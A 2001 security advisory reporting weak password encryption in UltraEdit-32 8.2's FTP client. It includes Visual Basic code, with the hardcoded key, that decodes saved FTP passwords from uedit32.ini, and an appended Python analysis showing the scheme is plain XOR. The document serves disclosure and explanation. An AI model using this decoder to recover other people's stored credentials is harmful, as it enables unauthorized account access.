UltraEdit FTP Client Weak Password Encryption

Published: 2001-08-25
Updated: 2001-08-25
Severity: High
Threat: Password recovery
Error type: Design error
Exploitation method: Server mode

Affected systems

IDM Computer Solutions, Inc UltraEdit-32 8.2

Detailed description

UltraEdit is a multi-purpose text editor that supports HTML, C/C++, VB, Java, Perl, XML, and C#. It also includes a hex editor and a small FTP client. The FTP client can remember the FTP password for the next session. When it does, the algorithm it uses to encrypt the stored password is very simple, so the FTP account password can be recovered.

Test code

' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' - if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe
Private Const Masterkey = "sdfkh we;34u[ jwef "

'Decode a single character
' i_Asc: value of one stored byte; i_Pos: 1-based position in the password
Public Function UEDecode(i_Asc, ByVal i_Pos As Integer)
    ' The key is 19 characters long and repeats; Mid() is 1-based
    i_Pos = i_Pos Mod 19
    If i_Pos = 0 Then i_Pos = 19
    UEDecode = ((Not i_Asc) And Asc(Mid(Masterkey, i_Pos, 1))) + (i_Asc And ((Not Asc(Mid(Masterkey, i_Pos, 1))) And 127))
End Function

'Decode password
' str_password: stored value, two hex digits per password character
Public Function UEDecodeString(str_password As String)
    Dim i As Integer
    UEDecodeString = ""
    For i = 1 To (Len(str_password) / 2)
        UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i))
    Next i
End Function

Solution

Do not use UltraEdit's FTP client.

Related information

"E. van Elk" <evelk@dsv.nl>
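The bit expression in UEDecode above is a byte-wise XOR against a fixed 19-character constant, which is why the stored password offers no protection once uedit32.ini is readable. The Python below is an added illustration, not part of the original advisory: it ports the VB expression, checks it against XOR for every byte value and key position, and round-trips a constructed sample password. `stored_form` (the encoding direction) is an assumption, inferred as the inverse of the published decoder.

```python
# Added illustration; not part of the original advisory.
MASTERKEY = b"sdfkh we;34u[ jwef "   # 19-byte constant quoted in the advisory


def ue_decode_byte(value: int, pos: int) -> int:
    """Literal port of UEDecode; pos is 1-based as in the VB code."""
    k = MASTERKEY[(pos - 1) % len(MASTERKEY)]
    return (~value & k) + (value & (~k & 127))


def ue_transform(data: bytes) -> bytes:
    """The same operation written as what it is: XOR with the key, 7 bits kept."""
    return bytes((b ^ MASTERKEY[i % len(MASTERKEY)]) & 0x7F
                 for i, b in enumerate(data))


def expression_is_plain_xor() -> bool:
    """Compare the VB bit expression with XOR for every byte and key position."""
    return all(ue_decode_byte(v, p) == (v ^ MASTERKEY[p - 1]) & 0x7F
               for v in range(256) for p in range(1, len(MASTERKEY) + 1))


def stored_form(password: str) -> str:
    """Assumed inverse of UEDecodeString: transform, then two hex digits per byte."""
    return ue_transform(password.encode("ascii")).hex().upper()


def recover(stored_hex: str) -> str:
    """Port of UEDecodeString: hex pairs back to bytes, then the same transform."""
    return ue_transform(bytes.fromhex(stored_hex)).decode("ascii")


if __name__ == "__main__":
    sample = "Example-Passw0rd-for-demo"   # constructed; longer than the key
    stored = stored_form(sample)
    print("bit expression == XOR :", expression_is_plain_xor())
    print("stored form           :", stored)
    print("recovered             :", recover(stored))
    # No salt or per-user secret: the same password always stores identically.
    print("deterministic         :", stored == stored_form(sample))
```

Because the key is a constant compiled into the program, the stored value is an encoding of the password, not an encryption of it; any saved FTP password should be treated as exposed to whoever can read the INI file.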